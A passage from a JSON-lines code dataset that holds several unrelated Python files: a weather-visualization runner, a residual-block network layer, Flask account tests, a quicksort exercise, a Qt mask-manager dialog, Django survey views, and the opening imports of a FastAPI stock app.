)\n","repo_name":"yomura-yomura/ta-java-output-reader","sub_path":"tajava/plot/fd/signal_map.py","file_name":"signal_map.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7049156962","text":"__author__ = \"Christian Kongsgaard\"\n__license__ = \"GNU GPLv3\"\n\n# -------------------------------------------------------------------------------------------------------------------- #\n# Imports\n\n\n# Module imports\nimport os\nimport typing\n\n# Weather imports\nfrom weather_visualizer import visualization\nfrom weather_visualizer import report\n\n# -------------------------------------------------------------------------------------------------------------------- #\n#\n\n\ndef main(config: dict):\n\n weather_file = config['epw']\n out_path = config['out']\n\n try:\n if config['report']:\n report.simple_report(weather_file, out_path)\n except KeyError:\n pass\n\n try:\n if config['figures']:\n if isinstance(config['figures'], list):\n for element in config['figures']:\n visualization.save_figure(weather_file, out_path, element, 'yearly')\n\n elif isinstance(config['figures'], dict):\n\n for key in config['figures'].keys():\n if isinstance(config['figures'][key], str):\n visualization.save_figure(weather_file, out_path, key, config['figures'][key])\n\n elif isinstance(config['figures'][key], list):\n\n for element in config['figures'][key]:\n visualization.save_figure(weather_file, out_path, key, element)\n\n elif isinstance(config['figures'][key], dict):\n for subkey in config['figures'][key].keys():\n\n try:\n size = config['figures'][key][subkey]['size']\n except KeyError:\n size = None\n\n try:\n colors = config['figures'][key][subkey]['colors']\n except KeyError:\n colors = None\n\n try:\n ylim = config['figures'][key][subkey]['limits']['y']\n except KeyError:\n ylim = None\n\n try:\n xlim = config['figures'][key][subkey]['limits']['x']\n except KeyError:\n xlim = None\n\n visualization.save_figure(weather_file, out_path, key, subkey, size, colors, xlim, ylim)\n else:\n raise KeyError(f'{config[\"figures\"][key]} is not supported in figures')\n else:\n raise KeyError(f'{config[\"figures\"]} with type {type(config[\"figures\"])} is not supported for figures.')\n except KeyError:\n pass","repo_name":"ocni-dtu/weather_visualizer","sub_path":"weather_visualizer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"671815249","text":"from pydl.nn.layers import Layer\nfrom pydl.nn.activations import Linear\nfrom pydl.nn.activations import Sigmoid\nfrom pydl.nn.activations import Tanh\nfrom pydl.nn.activations import SoftMax\nfrom pydl.nn.activations import ReLU\nfrom pydl.nn.conv import Conv\n\nactivations = {'linear': Linear,\n 'sigmoid': Sigmoid,\n 'tanh': Tanh,\n 'softmax': SoftMax,\n 'relu': ReLU\n }\n\n\nclass ResidualBlock(Layer):\n \"\"\"The Residual Block Class.\"\"\"\n\n def __init__(self, skip_connect, conv_layers, activation_fn='ReLU', name='Res_Block'):\n super().__init__(name=name)\n self._type = 'Res_Block'\n self._skip_connect = skip_connect\n self._block_layers = conv_layers\n self._block_out_activation_fn = activations[activation_fn.lower()]()\n\n self._block_layers[-1].activation = 'Linear'\n\n skip_size = self._skip_connect.shape[1:]\n block_out_shape = self._block_layers[-1].shape[1:]\n\n if skip_size != block_out_shape:\n self._skip_convolution = \\\n Conv(self._skip_connect, receptive_field=(1, 1), num_filters=block_out_shape[0],\n zero_padding=0, stride=self._block_layers[0].stride, name='Skip_Conv',\n weight_scale=1.0, xavier=True, activation_fn='Linear', batchnorm=True,\n force_adjust_output_shape=True)\n else:\n self._skip_convolution = None\n\n # Getters\n # -------\n @property\n def shape(self):\n # (None, num_filters, output_height, output_width) of the last (convolution) layer\n return self._block_layers[-1].shape\n\n @property\n def layers(self):\n return self._block_layers\n\n @property\n def skip_convolution(self):\n return self._skip_convolution\n\n def forward(self, inputs, inference=None, mask=None, temperature=1.0):\n layer_inp = inputs\n for layer in self._block_layers:\n layer_out = layer.forward(layer_inp, inference=inference)\n layer_inp = layer_out\n\n if self._skip_convolution is not None:\n skip_input = self._skip_convolution.forward(inputs, inference=inference)\n else:\n skip_input = inputs\n\n block_out = self._block_out_activation_fn.forward(layer_out + skip_input)\n return block_out\n\n def backward(self, inp_grad, reg_lambda=0, inputs=None):\n if len(inp_grad.shape) > 2: # The proceeding layer is a Convolution/Pooling layer\n pass\n else: # The proceeding layer is a FC layer\n # Reshape incoming gradients accordingly\n inp_grad = inp_grad.reshape(-1, *self._out_shape[1:])\n\n # dy/dz: Gradient of the output of the layer w.r.t the logits 'z'\n block_out_activation_grad = self._block_out_activation_fn.backward(inp_grad)\n\n layer_inp_grad = block_out_activation_grad\n for layer in reversed(self._block_layers):\n layer_out_grad = layer.backward(layer_inp_grad, reg_lambda)\n layer_inp_grad = layer_out_grad\n\n if self._skip_convolution is not None:\n skip_grad = self._skip_convolution.backward(block_out_activation_grad, reg_lambda)\n else:\n skip_grad = block_out_activation_grad\n\n block_out_grad = layer_out_grad + skip_grad\n\n return block_out_grad\n\n def update_weights(self, alpha):\n pass\n","repo_name":"nash911/PyDL","sub_path":"pydl/nn/residual_block.py","file_name":"residual_block.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14334365692","text":"import pytest\nimport flask\nfrom datetime import datetime\nfrom models import CommitPost, Repo, Task\n\n\ndef test_csrf_is_checked(app, app_ctx, client):\n @app.route('/csrf', methods=('GET', 'POST'))\n def csrfed():\n return 'sup'\n\n no_csrf_resp = client.post('/csrf')\n assert no_csrf_resp.status_code == 400\n assert b'CSRF' in no_csrf_resp.data\n\n assert client.post('/csrf', data={'csrf_token': 'wrong'}).status_code == 400\n resp = client.post('/csrf', data={'csrf_token': client.generate_csrf()})\n assert resp.status_code == 200, resp.data\n\n\n@pytest.mark.parametrize(('account_path', 'unauth_status'), (\n ('/account', 401),\n ('/add', 401),\n ('/account/email/new', 401),\n ('/account/name', 401),\n ('/repo/hex/unpost', 401),\n ('/repo/hex/rerender', 401),\n))\ndef test_account_unauthed(login, gh_blogger, account_path, unauth_status):\n with login(gh_blogger) as client:\n client.get(account_path).status_code == unauth_status\n\n\ndef test_add_commit(app_ctx, fake_github, login, gh_blogger):\n sha = '050c55865e2bb1c96bf0910488d3d6d521eb8f4d'\n with fake_github(), login(gh_blogger) as client:\n # get dash with latest commits\n resp = client.get('/account')\n assert resp.status_code == 200\n assert b'test some account stuff' in resp.data\n assert sha.encode() in resp.data\n assert b'unpost' not in resp.data # fresh account, no posts yet\n\n # add the latest\n resp = client.get('/add', query_string={\n 'csrf_token': client.csrf_token,\n 'repo_name': 'uniphil/commit--blog',\n 'sha': sha,\n })\n assert resp.status_code == 302, resp.data\n resp = client.get(resp.headers['location'])\n assert resp.status_code == 200\n assert b'unpost' in resp.data\n\n post = CommitPost.query.filter(CommitPost.hex == sha).first()\n assert post is not None\n assert post.blogger is gh_blogger\n\n # also try unposting\n resp = client.post(f'/uniphil/commit--blog/{sha}/unpost', data={\n 'csrf_token': client.csrf_token,\n })\n assert resp.status_code == 302\n resp = client.get(resp.headers['location'])\n assert resp.status_code == 200\n assert b'Unposted commit' in resp.data\n\n post = CommitPost.query.filter(CommitPost.hex == sha).first()\n assert post is None\n\n\ndef test_add_gh_email(app_ctx, login, gh_blogger):\n with login(gh_blogger) as client:\n client.generate_csrf()\n no_email = client.post('/account/add-gh-email', data={\n 'add_email': '',\n 'csrf_token': client.csrf_token,\n })\n assert no_email.status_code == 400\n assert b'missing gh_email address' in no_email.data\n\n with client.session_transaction() as sess:\n sess['gh_email'] = 'jel@example.com'\n ok_email = client.post('/account/add-gh-email', data={\n 'add_email': '',\n 'csrf_token': client.csrf_token,\n })\n assert ok_email.status_code == 302\n assert '/account' in ok_email.headers['Location']\n\n email = gh_blogger.get_email()\n assert email is not None\n assert email.address == 'jel@example.com'\n assert email.confirmed is None\n\n email_confirms = Task.query \\\n .filter(Task.task == 'email') \\\n .filter(Task.creator == gh_blogger) \\\n .filter(Task.details['recipient'].as_string() == 'jel@example.com') \\\n .filter(Task.details['message'].as_string() == 'confirm_email')\n assert email_confirms.count() == 1, 'one email task should be created'\n\n\ndef test_add_email(app_ctx, login, gh_blogger):\n with login(gh_blogger) as client:\n client.get('/account/email/new')\n resp = client.post('/account/email/new', data={\n 'address': 'jol@commit--blog.com',\n 'csrf_token': client.csrf_token,\n })\n assert resp.status_code == 302\n assert '/account' in resp.headers['Location']\n\n email = gh_blogger.get_email()\n assert email is not None\n assert email.address == 'jol@commit--blog.com'\n assert email.confirmed is None\n\n email_confirms = Task.query \\\n .filter(Task.task == 'email') \\\n .filter(Task.creator == gh_blogger) \\\n .filter(Task.details['recipient'].as_string() == 'jol@commit--blog.com') \\\n .filter(Task.details['message'].as_string() == 'confirm_email')\n assert email_confirms.count() == 1, 'one email task should be created'\n\n # resend\n resp = client.post('/accounts/confirm-email/jol@commit--blog.com/resend', data={\n 'csrf_token': client.csrf_token,\n })\n assert resp.status_code == 302, resp.data\n assert '/account' in resp.headers['Location']\n\n email_confirms = Task.query \\\n .filter(Task.task == 'email') \\\n .filter(Task.creator == gh_blogger) \\\n .filter(Task.details['recipient'].as_string() == 'jol@commit--blog.com') \\\n .filter(Task.details['message'].as_string() == 'confirm_email')\n assert email_confirms.count() == 2, 'another email task should be created'\n\n # verify\n link = email_confirms.first().details['variables']['confirm_url']\n get_page = client.get(link)\n assert get_page.status_code == 200\n assert email.token.encode() in get_page.data\n resp = client.post('/account/confirm-email/jol@commit--blog.com', data={\n 'csrf_token': client.csrf_token,\n 'token': email.token,\n })\n assert resp.status_code == 302, resp.data\n assert '/account' in resp.headers['location']\n assert isinstance(email.confirmed, datetime) is True\n\n\ndef test_revoke_oauth(app_ctx, login, token_for, token_login, gh_blogger):\n with login(gh_blogger) as client:\n client.generate_csrf()\n\n # check that the auth grant is not initially listed in account settings\n resp = client.get('/account')\n assert resp.status_code == 200, resp.data\n assert b'This app can create, view, and update posts' not in resp.data\n\n # auth grant appears after token has been created\n token, _token_string = token_for(gh_blogger)\n resp = client.get('/account')\n assert b'This app can create, view, and update posts' in resp.data\n\n # submit the revocation\n resp = client.post('/account/oauth/revoke', data={\n 'csrf_token': client.csrf_token,\n 'token_id': token.id,\n })\n assert resp.status_code == 302\n resp = client.get(resp.headers['location'])\n assert resp.status_code == 200\n assert b'Access token revoked' in resp.data\n assert b'This app can create, view, and update posts' not in resp.data\n","repo_name":"uniphil/commit--blog","sub_path":"tests/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"17261639742","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\n\ndef quick_sort(arr):\n if len(arr) <= 1:\n return arr\n pivot = arr[len(arr) // 2]\n lesser_arr, equal_arr, greater_arr = [], [], []\n for num in arr:\n if num < pivot:\n lesser_arr.append(num)\n elif num > pivot:\n greater_arr.append(num)\n else:\n equal_arr.append(num)\n return quick_sort(lesser_arr) + equal_arr + quick_sort(greater_arr)\n\n\nfor tc in range(1, T+1):\n n = int(input())\n li = list(map(int, input().split()))\n print(\"#{} {}\".format(tc, quick_sort(li)[n//2]))","repo_name":"Gwanghun-Im/algorithm_study","sub_path":"5205_퀵정렬/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74156528485","text":"from player import Player\nfrom time import sleep\nfrom gesture import Gesture\n\nclass Human(Player):\n def __init__(self, name):\n super().__init__()\n self.type = 'human'\n self.name = name\n\n def display_gestures(self):\n counter = 0\n print(f'{self.name}, choose between these options: ')\n for gesture in self.gestures:\n print(f'Choose {str(counter)} for {gesture}')\n sleep(1)\n counter += 1\n\n\n def gesture_update(self):\n self.display_gestures()\n self.gesture = Gesture()\n self.choice_of_gesture = self.gesture.pick_gesture()","repo_name":"Jdrive5/Rock-Paper-Scissors-Lizard-Spock","sub_path":"Rock, Paper, Scissors, Lizard, Spock/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22276937606","text":"import os\nimport numpy as np\n\nfrom PySide2.QtCore import QObject, Signal\nfrom PySide2.QtWidgets import (\n QCheckBox, QFileDialog, QMenu, QPushButton, QTableWidgetItem)\nfrom PySide2.QtGui import QCursor\n\nfrom hexrd.ui import enter_key_filter\n\nfrom hexrd.ui.utils import create_unique_name\nfrom hexrd.ui.hexrd_config import HexrdConfig\nfrom hexrd.ui.ui_loader import UiLoader\nfrom hexrd.ui.constants import ViewType\n\n\nclass MaskManagerDialog(QObject):\n\n # Emitted when masks are removed or visibility is toggled\n update_masks = Signal()\n\n def __init__(self, parent=None):\n super(MaskManagerDialog, self).__init__(parent)\n self.parent = parent\n\n loader = UiLoader()\n self.ui = loader.load_file('mask_manager_dialog.ui', parent)\n self.ui.installEventFilter(enter_key_filter)\n self.create_masks_list()\n self.threshold = False\n self.image_mode = ViewType.raw\n\n self.setup_connections()\n\n def show(self):\n self.setup_table()\n self.ui.show()\n\n def create_masks_list(self):\n self.masks = {}\n polar_data = HexrdConfig().polar_masks_line_data\n raw_data = HexrdConfig().raw_masks_line_data\n\n for i, (key, val) in enumerate(polar_data.items()):\n if not any(np.array_equal(m, val) for m in self.masks.values()):\n self.masks[key] = ('polar', val)\n for i, (key, val) in enumerate(raw_data.items()):\n if not any(np.array_equal(m, val) for m in self.masks.values()):\n self.masks[key] = val\n if HexrdConfig().threshold_mask_status:\n self.threshold = True\n self.masks['threshold'] = (\n 'threshold', HexrdConfig().threshold_mask)\n HexrdConfig().visible_masks = list(self.masks.keys())\n\n def update_masks_list(self, mask_type):\n if mask_type == 'polar':\n if not HexrdConfig().polar_masks_line_data:\n return\n for name, data in HexrdConfig().polar_masks_line_data.items():\n vals = self.masks.values()\n for val in data:\n if any(np.array_equal(val, m) for t, m in vals):\n continue\n self.masks[name] = (mask_type, val)\n elif mask_type == 'raw':\n if not HexrdConfig().raw_masks_line_data:\n return\n for name, value in HexrdConfig().raw_masks_line_data.items():\n det, val = value[0]\n vals = self.masks.values()\n if any(np.array_equal(val, m) for t, m in vals):\n continue\n self.masks[name] = (det, val)\n elif not self.threshold:\n name = create_unique_name(self.masks, 'threshold')\n self.masks[name] = ('threshold', HexrdConfig().threshold_mask)\n HexrdConfig().visible_masks.append(name)\n self.threshold = True\n self.setup_table()\n\n def setup_connections(self):\n self.ui.masks_table.cellDoubleClicked.connect(self.get_old_name)\n self.ui.masks_table.cellChanged.connect(self.update_mask_name)\n self.ui.masks_table.customContextMenuRequested.connect(\n self.context_menu_event)\n self.ui.export_masks.clicked.connect(self.export_visible_masks)\n HexrdConfig().mode_threshold_mask_changed.connect(\n self.update_masks_list)\n\n def setup_table(self, status=True):\n self.ui.masks_table.setRowCount(0)\n for i, key in enumerate(self.masks.keys()):\n # Add label\n self.ui.masks_table.insertRow(i)\n self.ui.masks_table.setItem(i, 0, QTableWidgetItem(key))\n\n # Add checkbox to toggle visibility\n cb = QCheckBox()\n status = key in HexrdConfig().visible_masks\n cb.setChecked(status)\n cb.setStyleSheet('margin-left:50%; margin-right:50%;')\n cb.toggled.connect(self.toggle_visibility)\n self.ui.masks_table.setCellWidget(i, 1, cb)\n\n # Add push button to remove mask\n pb = QPushButton('Remove Mask')\n pb.clicked.connect(self.remove_mask)\n self.ui.masks_table.setCellWidget(i, 2, pb)\n\n # Connect manager to raw image mode tab settings\n # for threshold mask\n mtype, data = self.masks[key]\n if mtype == 'threshold':\n self.setup_threshold_connections(cb, pb)\n\n def setup_threshold_connections(self, checkbox, pushbutton):\n HexrdConfig().mode_threshold_mask_changed.connect(checkbox.setChecked)\n checkbox.toggled.connect(self.threshold_toggled)\n\n def image_mode_changed(self, mode):\n self.image_mode = mode\n\n def threshold_toggled(self, v):\n HexrdConfig().set_threshold_mask_status(v, set_by_mgr=True)\n\n def toggle_visibility(self, checked):\n if self.ui.masks_table.currentRow() < 0:\n return\n\n row = self.ui.masks_table.currentRow()\n name = self.ui.masks_table.item(row, 0).text()\n mtype, data = self.masks[name]\n\n if checked and name and name not in HexrdConfig().visible_masks:\n HexrdConfig().visible_masks.append(name)\n elif not checked and name in HexrdConfig().visible_masks:\n HexrdConfig().visible_masks.remove(name)\n\n if self.image_mode == ViewType.polar:\n HexrdConfig().polar_masks_changed.emit()\n elif self.image_mode == ViewType.raw:\n HexrdConfig().raw_masks_changed.emit()\n\n def reset_threshold(self):\n self.threshold = False\n HexrdConfig().set_threshold_comparison(0)\n HexrdConfig().set_threshold_value(0.0)\n HexrdConfig().set_threshold_mask(None)\n HexrdConfig().set_threshold_mask_status(False)\n\n def remove_mask(self):\n row = self.ui.masks_table.currentRow()\n name = self.ui.masks_table.item(row, 0).text()\n mtype, data = self.masks[name]\n\n del self.masks[name]\n if name in HexrdConfig().visible_masks:\n HexrdConfig().visible_masks.remove(name)\n HexrdConfig().polar_masks_line_data.pop(name, None)\n HexrdConfig().polar_masks.pop(name, None)\n HexrdConfig().raw_masks_line_data.pop(name, None)\n HexrdConfig().raw_masks.pop(name, None)\n if mtype == 'threshold':\n self.reset_threshold()\n\n self.ui.masks_table.removeRow(row)\n\n if self.image_mode == ViewType.polar:\n HexrdConfig().polar_masks_changed.emit()\n elif self.image_mode == ViewType.raw:\n HexrdConfig().raw_masks_changed.emit()\n\n def get_old_name(self, row, column):\n if column != 0:\n return\n\n self.old_name = self.ui.masks_table.item(row, 0).text()\n\n def update_mask_name(self, row, column):\n if not hasattr(self, 'old_name') or self.old_name is None:\n return\n\n new_name = self.ui.masks_table.item(row, 0).text()\n if self.old_name != new_name:\n if new_name in self.masks.keys():\n self.ui.masks_table.item(row, 0).setText(self.old_name)\n return\n\n self.masks[new_name] = self.masks.pop(self.old_name)\n mtype, data = self.masks[new_name]\n if mtype == 'polar':\n value = HexrdConfig().polar_masks_line_data.pop(self.old_name)\n HexrdConfig().polar_masks[new_name] = value\n elif mtype != 'threshold':\n value = HexrdConfig().raw_masks_line_data.pop(self.old_name)\n HexrdConfig().raw_masks[new_name] = value\n\n if self.old_name in HexrdConfig().polar_masks.keys():\n value = HexrdConfig().polar_masks.pop(self.old_name)\n HexrdConfig().polar_masks[new_name] = value\n if self.old_name in HexrdConfig().raw_masks.keys():\n value = HexrdConfig().raw_masks.pop(self.old_name)\n HexrdConfig().raw_masks[new_name] = value\n\n if self.old_name in self.visible:\n self.visible.append(new_name)\n self.visible.remove(self.old_name)\n self.old_name = None\n\n def context_menu_event(self, event):\n index = self.ui.masks_table.indexAt(event)\n menu = QMenu(self.ui.masks_table)\n export = menu.addAction('Export Mask')\n action = menu.exec_(QCursor.pos())\n if action == export:\n selection = self.ui.masks_table.item(index.row(), 0).text()\n mtype, data = self.masks[selection]\n self.export_masks({selection: data})\n\n def export_masks(self, data):\n selected_file, selected_filter = QFileDialog.getSaveFileName(\n self.ui, 'Save Mask', HexrdConfig().working_dir,\n 'NPZ files (*.npz);; NPY files (*.npy)')\n\n if selected_file:\n HexrdConfig().working_dir = os.path.dirname(selected_file)\n path, ext = os.path.splitext(selected_file)\n\n if ext.lower() == '.npz':\n np.savez(selected_file, **data)\n elif ext.lower() == '.npy':\n np.save(selected_file, list(data.values())[0])\n\n def export_visible_masks(self):\n d = {}\n for mask in HexrdConfig().visible_masks:\n mtype, data = self.masks[mask]\n d[mask] = data\n self.export_masks(d)\n","repo_name":"cjh1/hexrdgui","sub_path":"hexrd/ui/mask_manager_dialog.py","file_name":"mask_manager_dialog.py","file_ext":"py","file_size_in_byte":9329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"15452684856","text":"from django.shortcuts import redirect, render\nfrom django.contrib import auth\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .models import AnswerQuestion, AnswerSheet, Form, Question\nimport numpy as np\n\n\ndef loginPage(request):\n\n error_given = False\n\n if request.user.is_authenticated:\n return redirect('main')\n\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n try:\n user = User.objects.get(username=username)\n except:\n if error_given is False:\n messages.error(request, 'Username does not exist!')\n error_given = True\n\n user = auth.authenticate(request, username=username, password=password)\n\n if user is not None:\n auth.login(request, user)\n return redirect('main')\n else:\n if error_given is False:\n messages.error(request, 'Username or password is incorrect!')\n error_given = True\n\n return render(request, 'login.html')\n\n\ndef logoutPage(request):\n auth.logout(request)\n return redirect('login')\n\n\n@login_required(login_url='login')\ndef mainPage(request):\n\n forms = Form.objects.all()\n forms = sorted(forms, key=lambda x: x.type_id)\n completed = []\n\n for form in forms:\n if AnswerSheet.objects.filter(form=form).filter(user=request.user):\n completed.append(True)\n else:\n completed.append(False)\n\n return render(request, 'main.html', {'listOfArgs': zip(forms, completed)})\n\n\n@login_required(login_url='login')\ndef formPage(request, form_id):\n\n form = Form.objects.get(id=form_id)\n questions = list(Question.objects.filter(forms__id=form.id))\n questions = sorted(questions, key=lambda x: x.description)\n old_answers_user = []\n old_answers = []\n first_quartile = []\n median = []\n third_quartile = []\n iqr = []\n\n if AnswerSheet.objects.filter(form=form).filter(user=request.user):\n return redirect('main')\n\n if form.type_id != 1 and not AnswerSheet.objects.filter(form__type_id=form.type_id - 1).filter(user=request.user):\n return redirect('main')\n\n if form.type_id > 1:\n for i in questions:\n oldAnswerUser = AnswerQuestion.objects.filter(question=i).filter(\n answer_sheet__form__type_id=form.type_id - 1).filter(answer_sheet__user=request.user)\n if len(oldAnswerUser) == 0:\n old_answers_user.append('N/A')\n else:\n old_answers_user.append(oldAnswerUser[0].option)\n oldAnswer = AnswerQuestion.objects.filter(question=i).filter(\n answer_sheet__form__type_id=form.type_id - 1)\n old_answers.clear()\n for j in oldAnswer:\n old_answers.append(int(j.option))\n if len(old_answers) == 0:\n first_quartile.append('N/A')\n median.append('N/A')\n third_quartile.append('N/A')\n iqr.append('N/A')\n else:\n values = np.percentile(old_answers, [25, 50, 75])\n first_quartile.append(\"{:.2f}\".format(values[0]))\n median.append(\"{:.2f}\".format(values[1]))\n third_quartile.append(\"{:.2f}\".format(values[2]))\n iqr.append(\"{:.2f}\".format(values[2] - values[0]))\n else:\n for i in questions:\n old_answers_user.append('N/A')\n first_quartile.append('N/A')\n median.append('N/A')\n third_quartile.append('N/A')\n iqr.append('N/A')\n\n answers = []\n answerSheet = AnswerSheet(form=form, user=request.user)\n finished = False\n\n if request.method == 'POST':\n for i in questions:\n opt = request.POST.get(str(i.id), False)\n comment = request.POST.get(str(i.id) + \" comment\", \"\")\n if opt == False:\n messages.error(request, 'Please answer all the questions.')\n answers.clear()\n finished = False\n break\n else:\n answers.append(AnswerQuestion(\n option=opt, comment=comment, question=i, answer_sheet=answerSheet))\n finished = True\n\n if finished == True:\n answerSheet.save()\n for j in answers:\n j.save()\n return redirect('main')\n\n return render(request, 'form.html', {'form': form, 'listOfArgs': zip(questions, old_answers_user, first_quartile, median, third_quartile, iqr)})\n\n\n@login_required(login_url='login')\ndef statsPage(request):\n\n if not request.user.is_superuser:\n return redirect('main')\n\n forms_first = True\n for i in list(Form.objects.filter(type_id=1)):\n if i.visible == False:\n forms_first = False\n break\n if len(Form.objects.filter(type_id=1)) == 0:\n forms_first = False\n\n forms_second = True\n for i in list(Form.objects.filter(type_id=2)):\n if i.visible == False:\n forms_second = False\n break\n if len(Form.objects.filter(type_id=2)) == 0:\n forms_second = False\n\n forms_third = True\n for i in list(Form.objects.filter(type_id=3)):\n if i.visible == False:\n forms_third = False\n break\n if len(Form.objects.filter(type_id=3)) == 0:\n forms_third = False\n\n forms_fourth = True\n for i in list(Form.objects.filter(type_id=4)):\n if i.visible == False:\n forms_fourth = False\n break\n if len(Form.objects.filter(type_id=4)) == 0:\n forms_fourth = False\n\n forms_fifth = True\n for i in list(Form.objects.filter(type_id=5)):\n if i.visible == False:\n forms_fifth = False\n break\n if len(Form.objects.filter(type_id=5)) == 0:\n forms_fifth = False\n\n forms_sixth = True\n for i in list(Form.objects.filter(type_id=6)):\n if i.visible == False:\n forms_sixth = False\n break\n if len(Form.objects.filter(type_id=6)) == 0:\n forms_sixth = False\n\n users = list(User.objects.filter(is_superuser=False))\n users = sorted(users, key=lambda x: x.username)\n firsts = []\n seconds = []\n thirds = []\n fourths = []\n fifths = []\n sixths = []\n\n for i in users:\n if len(Form.objects.filter(type_id=1)) == 0:\n firsts.append(2)\n elif len(Form.objects.filter(type_id=1)) > len(AnswerSheet.objects.filter(form__type_id=1).filter(user=i)):\n firsts.append(1)\n else:\n firsts.append(0)\n\n if len(Form.objects.filter(type_id=2)) == 0:\n seconds.append(2)\n elif len(Form.objects.filter(type_id=2)) > len(AnswerSheet.objects.filter(form__type_id=2).filter(user=i)) or len(Form.objects.filter(type_id=2)) == 0:\n seconds.append(1)\n else:\n seconds.append(0)\n\n if len(Form.objects.filter(type_id=3)) == 0:\n thirds.append(2)\n elif len(Form.objects.filter(type_id=3)) > len(AnswerSheet.objects.filter(form__type_id=3).filter(user=i)) or len(Form.objects.filter(type_id=3)) == 0:\n thirds.append(1)\n else:\n thirds.append(0)\n\n if len(Form.objects.filter(type_id=4)) == 0:\n fourths.append(2)\n elif len(Form.objects.filter(type_id=4)) > len(AnswerSheet.objects.filter(form__type_id=4).filter(user=i)) or len(Form.objects.filter(type_id=4)) == 0:\n fourths.append(1)\n else:\n fourths.append(0)\n\n if len(Form.objects.filter(type_id=5)) == 0:\n fifths.append(2)\n elif len(Form.objects.filter(type_id=5)) > len(AnswerSheet.objects.filter(form__type_id=5).filter(user=i)) or len(Form.objects.filter(type_id=5)) == 0:\n fifths.append(1)\n else:\n fifths.append(0)\n\n if len(Form.objects.filter(type_id=6)) == 0:\n sixths.append(2)\n elif len(Form.objects.filter(type_id=6)) > len(AnswerSheet.objects.filter(form__type_id=6).filter(user=i)) or len(Form.objects.filter(type_id=6)) == 0:\n sixths.append(1)\n else:\n sixths.append(0)\n\n type_one = 2\n type_two = 2\n type_three = 2\n type_four = 2\n type_five = 2\n type_six = 2\n\n forms_one = Form.objects.filter(type_id=1)\n if len(forms_one) > 0:\n if forms_one[0].visible:\n type_one = 0\n else:\n type_one = 1\n\n forms_two = Form.objects.filter(type_id=2)\n if len(forms_two) > 0:\n if forms_two[0].visible:\n type_two = 0\n else:\n type_two = 1\n\n forms_three = Form.objects.filter(type_id=3)\n if len(forms_three) > 0:\n if forms_three[0].visible:\n type_three = 0\n else:\n type_three = 1\n\n forms_four = Form.objects.filter(type_id=4)\n if len(forms_four) > 0:\n if forms_four[0].visible:\n type_four = 0\n else:\n type_four = 1\n\n forms_five = Form.objects.filter(type_id=5)\n if len(forms_five) > 0:\n if forms_five[0].visible:\n type_five = 0\n else:\n type_five = 1\n\n forms_six = Form.objects.filter(type_id=6)\n if len(forms_six) > 0:\n if forms_six[0].visible:\n type_six = 0\n else:\n type_six = 1\n\n return render(request, 'stats.html', {'forms_first': forms_first, 'forms_second': forms_second, 'forms_third': forms_third, 'forms_fourth': forms_fourth, 'forms_fifth': forms_fifth, 'forms_sixth': forms_sixth, 'type_one': type_one, 'type_two': type_two, 'type_three': type_three, 'type_four': type_four, 'type_five': type_five, 'type_six': type_six, 'listOfArgs': zip(users, firsts, seconds, thirds, fourths, fifths, sixths)})\n\n\n@login_required(login_url='login')\ndef formStatsPage(request, form_id):\n\n form = Form.objects.get(id=form_id)\n\n if not request.user.is_superuser:\n return redirect('main')\n\n if AnswerSheet.objects.filter(form=form).filter(user=request.user):\n return redirect('main')\n\n questions = list(Question.objects.filter(forms__id=form.id))\n questions = sorted(questions, key=lambda x: x.description)\n old_answers = []\n first_quartile = []\n median = []\n third_quartile = []\n iqr = []\n\n for i in questions:\n oldAnswer = AnswerQuestion.objects.filter(question=i).filter(\n answer_sheet__form__type_id=form.type_id)\n old_answers.clear()\n for j in oldAnswer:\n old_answers.append(int(j.option))\n if len(old_answers) == 0:\n first_quartile.append(\"N/A\")\n median.append(\"N/A\")\n third_quartile.append(\"N/A\")\n iqr.append(\"N/A\")\n else:\n values = np.percentile(old_answers, [25, 50, 75])\n first_quartile.append(\"{:.2f}\".format(values[0]))\n median.append(\"{:.2f}\".format(values[1]))\n third_quartile.append(\"{:.2f}\".format(values[2]))\n iqr.append(\"{:.2f}\".format(values[2] - values[0]))\n\n return render(request, 'formStats.html', {'form': form, 'listOfArgs': zip(questions, first_quartile, median, third_quartile, iqr)})\n\n\n@login_required(login_url='login')\ndef openFormsPage(request, type_id):\n\n if not request.user.is_superuser:\n return redirect('main')\n\n forms = Form.objects.filter(type_id=type_id)\n for form in forms:\n form.visible = True\n form.save()\n\n return redirect('stats')\n\n\n@login_required(login_url='login')\ndef closeFormsPage(request, type_id):\n\n if not request.user.is_superuser:\n return redirect('main')\n\n forms = Form.objects.filter(type_id=type_id)\n for form in forms:\n form.visible = False\n form.save()\n\n return redirect('stats')\n","repo_name":"acelikyurek/Delphi-Survey-Method-Project","sub_path":"form_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6115493111","text":"from fastapi import FastAPI, Request, Form, HTTPException\nimport sqlite3, config\nfrom fastapi.templating import Jinja2Templates\nfrom datetime import date\nimport datetime\nfrom fastapi.responses import RedirectResponse\nimport yfinance as yf\nimport pandas as pd\nfrom plotly import graph_objs as go \nfrom fastapi.responses import JSONResponse\nfrom statsmodels.tsa.stattools import adfuller\nimport tweepy\nfrom textblob import TextBlob\nimport statistics\nimport numpy as np\nfrom finvizfinance.quote import finvizfinance\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom textblob import 